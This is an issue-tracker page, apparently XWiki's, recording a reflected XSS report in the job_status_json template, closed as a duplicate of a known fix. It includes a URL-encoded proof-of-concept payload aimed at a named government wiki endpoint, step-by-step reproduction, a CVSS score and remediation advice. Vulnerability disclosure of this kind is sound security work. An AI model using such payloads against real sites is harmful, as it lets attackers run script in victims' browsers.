Loading...

XML

Word

Printable

Details

Type: Bug
Resolution: Duplicate
Priority: Major
Fix Version/s: None
Affects Version/s: 16.10.5
Component/s: None
Labels:
- security
Environment:
openDesk 1.4.0

Difficulty:
Unknown
Documentation:
N/A
Documentation in Release Notes:
N/A
Similar issues:

Description

The following issues was reported to use through NCSC:

Bug Key: QUALITY-dormouse
Bug Type: Execute code on client (e.g. XSS)
Scope: *.admin.ch
Endpoint: https://wiki.pocboss.admin.ch/bin/view/Main/?xpage=job_status_json&jobId=asdf&translationPrefix=%3c%2f%73%70%61%6e%3e%3c%78%73%73%20%6f%6e%73%63%72%6f%6c%6c%65%6e%64%3d%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%62%6c%6f%63%6b%3b%6f%76%65%72%66%6c%6f%77%3a%61%75%74%6f%3b%77%69%64%74%68%3a%31%70%78%3b%68%65%69%67%68%74%3a%31%70%78%3b%22%3e%78%3c%78%73%73%20%61%75%74%6f%66%6f%63%75%73%20%74%61%62%69%6e%64%65%7
IP used by the researcher: 59.92.92.87

Rating by the researcher:
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSS Score: 6.1

Report:
Bug description:
Reflected XSS via translationPrefix parameter on endpoint
https://wiki.pocboss.admin.ch/bin/view/Main/?xpage=job_status_json&jobId=asdf&translationPrefix=%3c%2f%73%70%61%6e%3e%3c%78%73%73%20%6f%6e%73%63%72%6f%6c%6c%65%6e%64%3d%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%62%6c%6f%63%6b%3b%6f%76%65%72%66%6c%6f%77%3a%61%75%74%6f%3b%77%69%64%74%68%3a%31%70%78%3b%68%65%69%67%68%74%3a%31%70%78%3b%22%3e%78%3c%78%73%73%20%61%75%74%6f%66%6f%63%75%73%20%74%61%62%69%6e%64%65%78%3d%31%3e&extensionVersionConstraint=%3dxss

Exploitation:
Step 1- Open a new browser tab and then open dev tools. Then open below link in that browser tab.. The javascript gets triggered and the domain gets printed in the console log.
https://wiki.pocboss.admin.ch/bin/view/Main/?xpage=job_status_json&jobId=asdf&translationPrefix=%3c%2f%73%70%61%6e%3e%3c%78%73%73%20%6f%6e%73%63%72%6f%6c%6c%65%6e%64%3d%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%62%6c%6f%63%6b%3b%6f%76%65%72%66%6c%6f%77%3a%61%75%74%6f%3b%77%69%64%74%68%3a%31%70%78%3b%68%65%69%67%68%74%3a%31%70%78%3b%22%3e%78%3c%78%73%73%20%61%75%74%6f%66%6f%63%75%73%20%74%61%62%69%6e%64%65%78%3d%31%3e&extensionVersionConstraint=%3dxss

PoC:
https://wiki.pocboss.admin.ch/bin/view/Main/?xpage=job_status_json&jobId=asdf&translationPrefix=%3c%2f%73%70%61%6e%3e%3c%78%73%73%20%6f%6e%73%63%72%6f%6c%6c%65%6e%64%3d%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%62%6c%6f%63%6b%3b%6f%76%65%72%66%6c%6f%77%3a%61%75%74%6f%3b%77%69%64%74%68%3a%31%70%78%3b%68%65%69%67%68%74%3a%31%70%78%3b%22%3e%78%3c%78%73%73%20%61%75%74%6f%66%6f%63%75%73%20%74%61%62%69%6e%64%65%78%3d%31%3e&extensionVersionConstraint=%3dxss

Impact:
The attacker can run arbitrary javascript on the victims browser

Remediation:
Add URL encoding on the vulnerable parameter

—

I can reproduce this issue in XWiki 16.10.5 (as part of openDesk 1.7.0), but not in 17.4.4 (as part of openDesk 1.8.0).

Attachments

Issue Links

duplicates

XWIKI-23096 Reflected XSS vulnerability in extension and job_status_json templates

Closed

Activity

People

Assignee:: Michael Hamann

Reporter:: René Fischer

Votes:: 0 Vote for this issue

Watchers:: 1 Start watching this issue

Dates

Created:: 11/Oct/25 11:13

Updated:: 3 days ago 18:14

Resolved:: 13/Oct/25 10:58

Date of First Response:: 13/Oct/25 10:58 AM